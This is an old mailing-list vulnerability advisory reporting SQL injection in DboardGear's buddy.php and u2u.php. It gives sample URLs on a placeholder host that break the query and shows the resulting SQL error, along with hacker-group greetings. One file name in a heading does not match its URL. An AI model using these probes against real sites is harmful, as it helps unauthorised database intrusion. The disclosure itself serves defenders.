Date: 24 Oct 2005 13:49:32 -0000
From: [email protected]
To: [email protected]Subject: DBoardGear SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
DboardGear ..
Search By Google :-
by DboardGear
Gr33tz :-
aLMaSTeR HaCKeR .. SQL Injection's FOunder - | [email protected]|-
Security4Arab .. A'Where Home ..
1- SQL Injection in buddy.php
http://www.site.com/dboard/buddy.php?action=add&buddy=|aLMaSTeR
2-SQL Injection in u2a.php
http://www.site.com/dboard/u2u.php?action=view&u2uid=|aLMaSTeR
Error:
You have an error in your SQL syntax near '' at line 1